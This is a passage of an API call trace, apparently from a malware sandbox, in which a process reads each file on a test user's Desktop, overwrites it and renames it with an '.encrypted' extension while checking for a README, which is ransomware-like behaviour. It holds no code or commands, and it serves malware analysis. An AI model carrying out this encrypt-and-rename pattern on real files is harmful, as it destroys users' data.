lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee400, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0153.281] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee860) returned 1 [0153.281] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee8dc | out: lpFileInformation=0x2ee8dc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0153.281] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee85c) returned 1 [0153.281] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\23Yw-skJm.rtf", nBufferLength=0x105, lpBuffer=0x2ee2d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\23Yw-skJm.rtf", lpFilePart=0x0) returned 0x33 [0153.281] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7c8) returned 1 [0153.281] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\23Yw-skJm.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\23yw-skjm.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0153.283] GetFileType (hFile=0x4d0) returned 0x1 [0153.283] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7c4) returned 1 [0153.283] GetFileType (hFile=0x4d0) returned 0x1 [0153.283] WriteFile (in: hFile=0x4d0, lpBuffer=0x247006c*, nNumberOfBytesToWrite=0x7ca0, lpNumberOfBytesWritten=0x2ee884, lpOverlapped=0x0 | out: lpBuffer=0x247006c*, lpNumberOfBytesWritten=0x2ee884*=0x7ca0, lpOverlapped=0x0) returned 1 [0153.285] CloseHandle (hObject=0x4d0) returned 1 [0153.286] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\23Yw-skJm.rtf", nBufferLength=0x105, lpBuffer=0x2ee40c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\23Yw-skJm.rtf", lpFilePart=0x0) returned 0x33 [0153.286] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\23Yw-skJm.rtf.encrypted", nBufferLength=0x105, lpBuffer=0x2ee40c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\23Yw-skJm.rtf.encrypted", lpFilePart=0x0) returned 0x3d [0153.286] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee86c) returned 1 [0153.286] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\23Yw-skJm.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\23yw-skjm.rtf"), fInfoLevelId=0x0, lpFileInformation=0x2ee8e8 | out: lpFileInformation=0x2ee8e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf6843920, ftCreationTime.dwHighDateTime=0x1d5d8ad, ftLastAccessTime.dwLowDateTime=0xe2b7dd50, ftLastAccessTime.dwHighDateTime=0x1d5e025, ftLastWriteTime.dwLowDateTime=0x4254aa00, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0x7ca0)) returned 1 [0153.286] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee868) returned 1 [0153.286] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\23Yw-skJm.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\23yw-skjm.rtf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\23Yw-skJm.rtf.encrypted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\23yw-skjm.rtf.encrypted")) returned 1 [0153.289] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8dFMbgTmZgC_.avi", nBufferLength=0x105, lpBuffer=0x2ee2ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8dFMbgTmZgC_.avi", lpFilePart=0x0) returned 0x36 [0153.289] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7e0) returned 1 [0153.289] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8dFMbgTmZgC_.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\8dfmbgtmzgc_.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0153.289] GetFileType (hFile=0x4d0) returned 0x1 [0153.289] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7dc) returned 1 [0153.289] GetFileType (hFile=0x4d0) returned 0x1 [0153.289] GetFileSize (in: hFile=0x4d0, lpFileSizeHigh=0x2ee8e8 | out: lpFileSizeHigh=0x2ee8e8*=0x0) returned 0x6ab3 [0153.289] ReadFile (in: hFile=0x4d0, lpBuffer=0x24781e4, nNumberOfBytesToRead=0x6ab3, lpNumberOfBytesRead=0x2ee894, lpOverlapped=0x0 | out: lpBuffer=0x24781e4*, lpNumberOfBytesRead=0x2ee894*=0x6ab3, lpOverlapped=0x0) returned 1 [0153.290] CloseHandle (hObject=0x4d0) returned 1 [0153.331] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee400, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0153.331] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee860) returned 1 [0153.331] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee8dc | out: lpFileInformation=0x2ee8dc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0153.331] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee85c) returned 1 [0153.331] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8dFMbgTmZgC_.avi", nBufferLength=0x105, lpBuffer=0x2ee2d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8dFMbgTmZgC_.avi", lpFilePart=0x0) returned 0x36 [0153.331] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7c8) returned 1 [0153.331] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8dFMbgTmZgC_.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\8dfmbgtmzgc_.avi"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0153.333] GetFileType (hFile=0x4d0) returned 0x1 [0153.333] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7c4) returned 1 [0153.333] GetFileType (hFile=0x4d0) returned 0x1 [0153.333] WriteFile (in: hFile=0x4d0, lpBuffer=0x22d922c*, nNumberOfBytesToWrite=0x6ac0, lpNumberOfBytesWritten=0x2ee884, lpOverlapped=0x0 | out: lpBuffer=0x22d922c*, lpNumberOfBytesWritten=0x2ee884*=0x6ac0, lpOverlapped=0x0) returned 1 [0153.334] CloseHandle (hObject=0x4d0) returned 1 [0153.335] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8dFMbgTmZgC_.avi", nBufferLength=0x105, lpBuffer=0x2ee40c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8dFMbgTmZgC_.avi", lpFilePart=0x0) returned 0x36 [0153.335] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8dFMbgTmZgC_.avi.encrypted", nBufferLength=0x105, lpBuffer=0x2ee40c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8dFMbgTmZgC_.avi.encrypted", lpFilePart=0x0) returned 0x40 [0153.335] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee86c) returned 1 [0153.335] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8dFMbgTmZgC_.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\8dfmbgtmzgc_.avi"), fInfoLevelId=0x0, lpFileInformation=0x2ee8e8 | out: lpFileInformation=0x2ee8e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbd2e790, ftCreationTime.dwHighDateTime=0x1d5dd70, ftLastAccessTime.dwLowDateTime=0x1c61dd50, ftLastAccessTime.dwHighDateTime=0x1d5e5d8, ftLastWriteTime.dwLowDateTime=0x425bce20, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0x6ac0)) returned 1 [0153.335] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee868) returned 1 [0153.335] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8dFMbgTmZgC_.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\8dfmbgtmzgc_.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8dFMbgTmZgC_.avi.encrypted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\8dfmbgtmzgc_.avi.encrypted")) returned 1 [0153.338] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\B_V9.png", nBufferLength=0x105, lpBuffer=0x2ee2ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\B_V9.png", lpFilePart=0x0) returned 0x2e [0153.338] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7e0) returned 1 [0153.338] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\B_V9.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\b_v9.png"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0153.338] GetFileType (hFile=0x4d0) returned 0x1 [0153.338] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7dc) returned 1 [0153.338] GetFileType (hFile=0x4d0) returned 0x1 [0153.338] GetFileSize (in: hFile=0x4d0, lpFileSizeHigh=0x2ee8e8 | out: lpFileSizeHigh=0x2ee8e8*=0x0) returned 0x11f67 [0153.338] ReadFile (in: hFile=0x4d0, lpBuffer=0x22e01e4, nNumberOfBytesToRead=0x11f67, lpNumberOfBytesRead=0x2ee894, lpOverlapped=0x0 | out: lpBuffer=0x22e01e4*, lpNumberOfBytesRead=0x2ee894*=0x11f67, lpOverlapped=0x0) returned 1 [0153.339] CloseHandle (hObject=0x4d0) returned 1 [0153.357] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee400, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0153.357] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee860) returned 1 [0153.357] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee8dc | out: lpFileInformation=0x2ee8dc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0153.357] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee85c) returned 1 [0153.357] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\B_V9.png", nBufferLength=0x105, lpBuffer=0x2ee2d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\B_V9.png", lpFilePart=0x0) returned 0x2e [0153.357] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7c8) returned 1 [0153.357] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\B_V9.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\b_v9.png"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0153.359] GetFileType (hFile=0x4d0) returned 0x1 [0153.359] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7c4) returned 1 [0153.359] GetFileType (hFile=0x4d0) returned 0x1 [0153.359] WriteFile (in: hFile=0x4d0, lpBuffer=0x2362f54*, nNumberOfBytesToWrite=0x11f70, lpNumberOfBytesWritten=0x2ee884, lpOverlapped=0x0 | out: lpBuffer=0x2362f54*, lpNumberOfBytesWritten=0x2ee884*=0x11f70, lpOverlapped=0x0) returned 1 [0153.360] CloseHandle (hObject=0x4d0) returned 1 [0153.363] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\B_V9.png", nBufferLength=0x105, lpBuffer=0x2ee40c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\B_V9.png", lpFilePart=0x0) returned 0x2e [0153.363] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\B_V9.png.encrypted", nBufferLength=0x105, lpBuffer=0x2ee40c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\B_V9.png.encrypted", lpFilePart=0x0) returned 0x38 [0153.363] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee86c) returned 1 [0153.363] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\B_V9.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\b_v9.png"), fInfoLevelId=0x0, lpFileInformation=0x2ee8e8 | out: lpFileInformation=0x2ee8e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdc8140f0, ftCreationTime.dwHighDateTime=0x1d5e3e2, ftLastAccessTime.dwLowDateTime=0xce584e40, ftLastAccessTime.dwHighDateTime=0x1d5e655, ftLastWriteTime.dwLowDateTime=0x426090e0, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0x11f70)) returned 1 [0153.363] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee868) returned 1 [0153.363] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\B_V9.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\b_v9.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\B_V9.png.encrypted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\b_v9.png.encrypted")) returned 1 [0153.365] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cJ6NTjjSczDlq4GKMmq.mp3", nBufferLength=0x105, lpBuffer=0x2ee2ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cJ6NTjjSczDlq4GKMmq.mp3", lpFilePart=0x0) returned 0x3d [0153.365] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7e0) returned 1 [0153.365] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cJ6NTjjSczDlq4GKMmq.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cj6ntjjsczdlq4gkmmq.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0153.365] GetFileType (hFile=0x4d0) returned 0x1 [0153.365] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7dc) returned 1 [0153.365] GetFileType (hFile=0x4d0) returned 0x1 [0153.365] GetFileSize (in: hFile=0x4d0, lpFileSizeHigh=0x2ee8e8 | out: lpFileSizeHigh=0x2ee8e8*=0x0) returned 0x1404 [0153.365] ReadFile (in: hFile=0x4d0, lpBuffer=0x237538c, nNumberOfBytesToRead=0x1404, lpNumberOfBytesRead=0x2ee894, lpOverlapped=0x0 | out: lpBuffer=0x237538c*, lpNumberOfBytesRead=0x2ee894*=0x1404, lpOverlapped=0x0) returned 1 [0153.367] CloseHandle (hObject=0x4d0) returned 1 [0153.381] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee400, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0153.381] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee860) returned 1 [0153.381] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee8dc | out: lpFileInformation=0x2ee8dc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0153.381] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee85c) returned 1 [0153.381] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cJ6NTjjSczDlq4GKMmq.mp3", nBufferLength=0x105, lpBuffer=0x2ee2d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cJ6NTjjSczDlq4GKMmq.mp3", lpFilePart=0x0) returned 0x3d [0153.381] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7c8) returned 1 [0153.381] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cJ6NTjjSczDlq4GKMmq.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cj6ntjjsczdlq4gkmmq.mp3"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0153.382] GetFileType (hFile=0x4d0) returned 0x1 [0153.382] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7c4) returned 1 [0153.382] GetFileType (hFile=0x4d0) returned 0x1 [0153.382] WriteFile (in: hFile=0x4d0, lpBuffer=0x23c8588*, nNumberOfBytesToWrite=0x1410, lpNumberOfBytesWritten=0x2ee884, lpOverlapped=0x0 | out: lpBuffer=0x23c8588*, lpNumberOfBytesWritten=0x2ee884*=0x1410, lpOverlapped=0x0) returned 1 [0153.383] CloseHandle (hObject=0x4d0) returned 1 [0153.384] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cJ6NTjjSczDlq4GKMmq.mp3", nBufferLength=0x105, lpBuffer=0x2ee40c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cJ6NTjjSczDlq4GKMmq.mp3", lpFilePart=0x0) returned 0x3d [0153.384] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cJ6NTjjSczDlq4GKMmq.mp3.encrypted", nBufferLength=0x105, lpBuffer=0x2ee40c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cJ6NTjjSczDlq4GKMmq.mp3.encrypted", lpFilePart=0x0) returned 0x47 [0153.384] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee86c) returned 1 [0153.384] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cJ6NTjjSczDlq4GKMmq.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cj6ntjjsczdlq4gkmmq.mp3"), fInfoLevelId=0x0, lpFileInformation=0x2ee8e8 | out: lpFileInformation=0x2ee8e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98159b50, ftCreationTime.dwHighDateTime=0x1d5de15, ftLastAccessTime.dwLowDateTime=0xae511b30, ftLastAccessTime.dwHighDateTime=0x1d5d936, ftLastWriteTime.dwLowDateTime=0x4262f240, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0x1410)) returned 1 [0153.384] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee868) returned 1 [0153.384] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cJ6NTjjSczDlq4GKMmq.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cj6ntjjsczdlq4gkmmq.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cJ6NTjjSczDlq4GKMmq.mp3.encrypted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cj6ntjjsczdlq4gkmmq.mp3.encrypted")) returned 1 [0153.386] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Dj_Db5l6vQeyuys.mp3", nBufferLength=0x105, lpBuffer=0x2ee2ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Dj_Db5l6vQeyuys.mp3", lpFilePart=0x0) returned 0x39 [0153.386] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7e0) returned 1 [0153.386] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Dj_Db5l6vQeyuys.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dj_db5l6vqeyuys.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0153.386] GetFileType (hFile=0x4d0) returned 0x1 [0153.386] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7dc) returned 1 [0153.386] GetFileType (hFile=0x4d0) returned 0x1 [0153.386] GetFileSize (in: hFile=0x4d0, lpFileSizeHigh=0x2ee8e8 | out: lpFileSizeHigh=0x2ee8e8*=0x0) returned 0x5527 [0153.386] ReadFile (in: hFile=0x4d0, lpBuffer=0x23c9f0c, nNumberOfBytesToRead=0x5527, lpNumberOfBytesRead=0x2ee894, lpOverlapped=0x0 | out: lpBuffer=0x23c9f0c*, lpNumberOfBytesRead=0x2ee894*=0x5527, lpOverlapped=0x0) returned 1 [0153.401] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee400, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0153.401] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee860) returned 1 [0153.401] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee8dc | out: lpFileInformation=0x2ee8dc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0153.402] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee85c) returned 1 [0153.402] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Dj_Db5l6vQeyuys.mp3", nBufferLength=0x105, lpBuffer=0x2ee2d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Dj_Db5l6vQeyuys.mp3", lpFilePart=0x0) returned 0x39 [0153.402] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7c8) returned 1 [0153.402] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Dj_Db5l6vQeyuys.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dj_db5l6vqeyuys.mp3"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0153.403] GetFileType (hFile=0x4d0) returned 0x1 [0153.403] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7c4) returned 1 [0153.403] GetFileType (hFile=0x4d0) returned 0x1 [0153.403] WriteFile (in: hFile=0x4d0, lpBuffer=0x24316ac*, nNumberOfBytesToWrite=0x5530, lpNumberOfBytesWritten=0x2ee884, lpOverlapped=0x0 | out: lpBuffer=0x24316ac*, lpNumberOfBytesWritten=0x2ee884*=0x5530, lpOverlapped=0x0) returned 1 [0153.411] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Dj_Db5l6vQeyuys.mp3", nBufferLength=0x105, lpBuffer=0x2ee40c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Dj_Db5l6vQeyuys.mp3", lpFilePart=0x0) returned 0x39 [0153.411] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Dj_Db5l6vQeyuys.mp3.encrypted", nBufferLength=0x105, lpBuffer=0x2ee40c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Dj_Db5l6vQeyuys.mp3.encrypted", lpFilePart=0x0) returned 0x43 [0153.411] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee86c) returned 1 [0153.411] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Dj_Db5l6vQeyuys.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dj_db5l6vqeyuys.mp3"), fInfoLevelId=0x0, lpFileInformation=0x2ee8e8 | out: lpFileInformation=0x2ee8e8*(dwFileAttributes=0x20, 